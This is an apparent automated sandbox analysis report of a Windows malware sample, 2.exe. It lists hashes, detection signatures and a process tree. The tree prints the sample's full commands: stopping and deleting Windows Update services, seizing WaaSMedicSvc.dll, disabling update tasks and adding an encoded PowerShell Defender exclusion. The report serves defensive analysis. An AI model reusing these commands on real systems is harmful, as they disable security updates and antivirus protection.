Analysis
-
max time kernel
299s -
max time network
270s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64 arch:x86 image:win7-20220812-en locale:en-us os:windows7-x64 system -
submitted
24-10-2022 15:59
Behavioral task
behavioral1
Sample
2.exe
Resource
win7-20220812-en
General
-
Target
2.exe
-
Size
7.4MB
-
MD5
8ddc35d10e70c08abd8a15a787d3b586
-
SHA1
08219f2e68c5e72a7d218d63cea15bf8db5aff6c
-
SHA256
057e1aaca82b095ce425737bb5108155c8717868276e68a9fa93084850d2a585
-
SHA512
99046db0247aebc545daf5e5380a28edec47dffe0b9d036d504bff8616c7c39d2deaa088dac8fe779e497d9b060c76bcb423600426faa70e9ac896de342ed79a
-
SSDEEP
196608:qs7RTqMym+7SHwnuyFAHqEs4ezo22zS9nln606:T7Y11nu+cso2PlnQ
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exe
description | ioc | process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security | reg.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
2.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 2.exe
Drops file in Drivers directory 1 IoCs
Processes:
conhost.exe
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | conhost.exe
Executes dropped EXE 1 IoCs
Processes:
explorer.exe
pid | process
2040 | explorer.exe
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exe, icacls.exe
pid | process
2000 | takeown.exe
896 | icacls.exe
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
2.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 2.exe
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exe, icacls.exe
pid | process
2000 | takeown.exe
896 | icacls.exe
Processes:
resource | yara_rule
behavioral1/memory/1784-54-0x0000000000400000-0x00000000010DC000-memory.dmp | themida
behavioral1/memory/1784-55-0x0000000000400000-0x00000000010DC000-memory.dmp | themida
behavioral1/memory/1784-57-0x0000000000400000-0x00000000010DC000-memory.dmp | themida
Processes:
2.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 2.exe
Drops file in System32 directory 1 IoCs
Processes:
powershell.exe
description | ioc | process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
2.exe
pid | process
1784 | 2.exe
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exe
description | pid | process | target process
PID 240 set thread context of 2040 | 240 | conhost.exe | explorer.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
sc.exe (5 instances)
pid | process
1556 | sc.exe
1416 | sc.exe
1900 | sc.exe
1068 | sc.exe
440 | sc.exe
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exe (9 instances)
pid | process
1880 | reg.exe
1468 | reg.exe
836 | reg.exe
1352 | reg.exe
1584 | reg.exe
316 | reg.exe
1660 | reg.exe
1588 | reg.exe
1044 | reg.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exe, explorer.exe
pid | process
2012 | powershell.exe
2040 | explorer.exe (repeated)
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 464 -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
powershell.exe, powercfg.exe (4 instances), takeown.exe, explorer.exe
description | pid | process
Token: SeDebugPrivilege | 2012 | powershell.exe
Token: SeShutdownPrivilege | 1320 | powercfg.exe
Token: SeShutdownPrivilege | 1348 | powercfg.exe
Token: SeShutdownPrivilege | 1316 | powercfg.exe
Token: SeShutdownPrivilege | 1540 | powercfg.exe
Token: SeTakeOwnershipPrivilege | 2000 | takeown.exe
Token: SeLockMemoryPrivilege | 2040 | explorer.exe
Token: SeLockMemoryPrivilege | 2040 | explorer.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2.exe, conhost.exe, cmd.exe, cmd.exe
description | pid | process | target process
PID 1784 wrote to memory of 240 | 1784 | 2.exe | conhost.exe
PID 240 wrote to memory of 2012 | 240 | conhost.exe | powershell.exe
PID 240 wrote to memory of 776 | 240 | conhost.exe | cmd.exe
PID 240 wrote to memory of 580 | 240 | conhost.exe | cmd.exe
PID 776 wrote to memory of 440 | 776 | cmd.exe | sc.exe
PID 776 wrote to memory of 1556 | 776 | cmd.exe | sc.exe
PID 580 wrote to memory of 1320 | 580 | cmd.exe | powercfg.exe
PID 776 wrote to memory of 1416 | 776 | cmd.exe | sc.exe
PID 776 wrote to memory of 1900 | 776 | cmd.exe | sc.exe
PID 580 wrote to memory of 1348 | 580 | cmd.exe | powercfg.exe
PID 580 wrote to memory of 1316 | 580 | cmd.exe | powercfg.exe
PID 776 wrote to memory of 1068 | 776 | cmd.exe | sc.exe
PID 776 wrote to memory of 316 | 776 | cmd.exe | reg.exe
PID 580 wrote to memory of 1540 | 580 | cmd.exe | powercfg.exe
PID 776 wrote to memory of 1880 | 776 | cmd.exe | reg.exe
PID 776 wrote to memory of 1468 | 776 | cmd.exe | reg.exe
PID 776 wrote to memory of 836 | 776 | cmd.exe | reg.exe
PID 776 wrote to memory of 1352 | 776 | cmd.exe | reg.exe
PID 776 wrote to memory of 2000 | 776 | cmd.exe | takeown.exe
PID 776 wrote to memory of 896 | 776 | cmd.exe | icacls.exe
PID 776 wrote to memory of 1660 | 776 | cmd.exe | reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\2.exe"2⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAbwBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAGsAdgBwAHEAIwA+ACAAQAAoACAAPAAjAHIAdgBhACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwB0AHUAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAdQBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG8AaQAjAD4A"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exeC:\Windows\explorer.exe aanewtbrhdbz1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/kRRORiyYEXQjlDWVnkLqznS8gWE6k3nXSMLi6nDwXFvazQSyw8+toWHTrnijZtUQ24/815/zhCZs1iAzqCrMGLeWXdJqAzh1OZvKAkAlE5F0/M1ZedWuCT9hZ79EApH/3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
\Users\Admin\AppData\Roaming\52D2.tmp
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e